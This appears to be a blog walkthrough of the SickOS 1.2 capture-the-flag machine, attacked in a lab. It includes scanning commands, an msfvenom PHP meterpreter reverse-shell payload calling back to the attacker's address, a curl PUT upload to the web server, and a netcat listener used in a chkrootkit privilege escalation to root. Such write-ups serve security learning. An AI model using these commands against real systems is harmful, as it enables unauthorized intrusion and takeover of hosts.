SICKOS 1.2 – CTF

This is my walk-through of the SickOS 1.2 challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law. Be smart folks, and enjoy the walk-through.

Full NMAP scan of host:

root@kali:~# nmap -p- -A 192.168.1.224

The NMAP scan shows ports 22 & 80 open.  A quick check on port 80 with my browser:

I ran Nikto and did not come up with anything useful.  Ran Dirb to see if I can find additional directories:

root@kali:~# dirb http://192.168.1.224

Found a /test/ directory. Checked with browser but the directory is empty:

Checked for Lighttpd vulnerabilities but did not find anything for the version in use.  Used cURL to check available HTTP methods for the /test/ directory:

root@kali:~# curl -v -X OPTIONS http://192.168.1.224/test/

I see that PUT is allowed for this directory, so I decide to try to upload a reverse shell.  I create a PHP reverse shell using msfvenom.

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.207 LPORT=443 -f raw > sickos.php

I attempted to upload the file,  but kept getting an expectation failed message:

Did some Google searching and figured out I needed to use the -0 option to force cURL to use HTTP version 1.0 instead of the default 1.1:

root@kali:~# curl -v -T sickos.php –url http://192.168.1.224/test/ -0

Configured MSF to catch my reverse shell:

Executed payload with cURL and caught the shell with MSF:

root@kali:~# curl http://192.168.1.224/test/sickos.php

With my low priv shell I do some enumeration:

Found a vulnerable version of Chkrootkit running in cron.daily:

www-data@ubuntu:/$ ls -al /etc/cron*

www-data@ubuntu:/$ chkrootkit -V

Checking the local Exploit DB:

root@kali:~# searchsploit chkrootkit

To summarize the vulnerability – Chkrootkit prior to .50 will run any executable named /tmp/update as root. Here is a link with more info: https://www.exploit-db.com/exploits/38775/

I create a bash script and name it update:

I copy the script using my existing meterpreter session:

Once I copy the script over I change the permissions to make it executable:

I start up a nc listener and in a few minutes I have my shell:

root@kali:~# nc -nlvp 8080

And with root privs I am able to access the proof file:

cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

Hope this was helpful!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s